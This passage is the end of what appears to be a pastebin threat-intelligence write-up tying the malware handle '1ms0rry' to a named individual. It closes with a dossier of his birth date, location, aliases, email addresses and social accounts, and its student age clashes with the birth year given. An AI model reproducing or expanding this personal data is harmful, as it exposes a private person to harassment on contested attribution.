  626. Let's take a look a for example https://github.com/Gatsoev/csgo.tm-fakeSellExtension.
  627.  
  628. Curious isn't it ? It looks like the Github account was just renamed.
  629. We now have enough proof for linking 1ms0rry to Ацамаз Гацоев / Atsamaz Gatsoev
  630.  
  631. Who the hell is Atsamaz Gatsoev? We can find a protential picture of him in his weblancer profile :
  632.  
  633.  
  634. Confirmed by Alan Salbiev from Education Ministry on a Facebook post.
  635. Alan Salbiev describes 1ms0rry like that:
  636.  
  637. Google translate:
  638.  
  639. Atsamaz Gatsoev.
  640. 11-grad student from Vladikavkaz.
  641. He ran and published in his blog theme more than 20 research papers in the field of information security, in particular, virology,
  642. namely: analysis of protection and opening of various vredosnogo software, methods of cyber attacks and protecting against them.
  643. Over 1,400 people signed it.
  644. December 2-3, 2017 in Vladikavkaz was held the first hackathon among high school students for the prize of the Head of the Republic
  645. in which Atsamaz acted as a mentor.
  646. Atsamaz he organized and conducted twice a thematic Olympiad on CTF (Capture the flag) of information security in the format Task-based,
  647. which was attended by over 100 people from different cities and countries.
  648. In addition, with the direct participation Atsamaz (design, commissioning and start-up) in the work of our Office has been implemented
  649. application based on the principles of distributed data registry (blokcheyn - technology)
  650. February 25, 2018 at competitions on sports hacking at the University ITMO our hero confidently walked rivals from Komsomolsk-on-Amur,
  651. Khanty-Mansiysk, Penza, Pyatigorsk, etc. As a result, a schoolboy from Vladikavkaz entered the top 15 in St. Petersbur>.
  652. At Atsamaz there is a dream - to enter the University of ITMO. Our Office will provide every possible assistance to a talented guy.
  653. Special mention should be noted that the successes Atsamaz lies the great work of his parents, who were able to instill in him the
  654. awareness, independence, the desire for knowledge and hard work. Take an example from them.
  655.  
  656.  
  657. It's easy to protect against malware when you develop them, isn't it ?
  658. TL;DR:
  659. (We only keep information related to his malware activities.)
  660.  
  661. Name: Ацамаз Гацоев, Atsamaz Gatsoev,
  662. Born: 1997 Aug. 14
  663. Location: Tskhinvali region
  664. Nickname: 1ms0rry, gorno, hypega, Gatsoev, lordatsa, atsam;
  665. Email: lordatsa@mail.ru gornostay322@mail.ru
  666. Social: https://vk.com/quiet_and_invisible https://twitter.com/ims0rry_off https://github.com/ims0rry/ https://plus.google.com/u/0/109976643017066209762/
  667. There is enough information for knowing exactly who is 1ms0rry :)
  668.  
  669. Conclusion
  670. Obviously, this write-up doesn't cover every malware (you can find some telegra.ph bot) but it's enough data if somebody needs to go deeper.
  671.  
  672. This is not a major threat actor, malware developed by him are not really advanced and the web panels are basic (except the design !) but the SorryCoin backend was interesting.
  673. It is obvious that here, Ацамаз Гацоев is a malware developer/reseller and not a researcher or a red-teamer that develops malware for POC purpose.
  674. Just in case of, we archived all the links (forum, twitter, telegraph...) on archive.org :).
  675. That all folks!
  676. We hope you enjoy the read if you need more information don't hesitate to ping us
  677. Thanks again to MalwareMustDie and sS.! for the awesome work and greetz to NibbleHunter
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement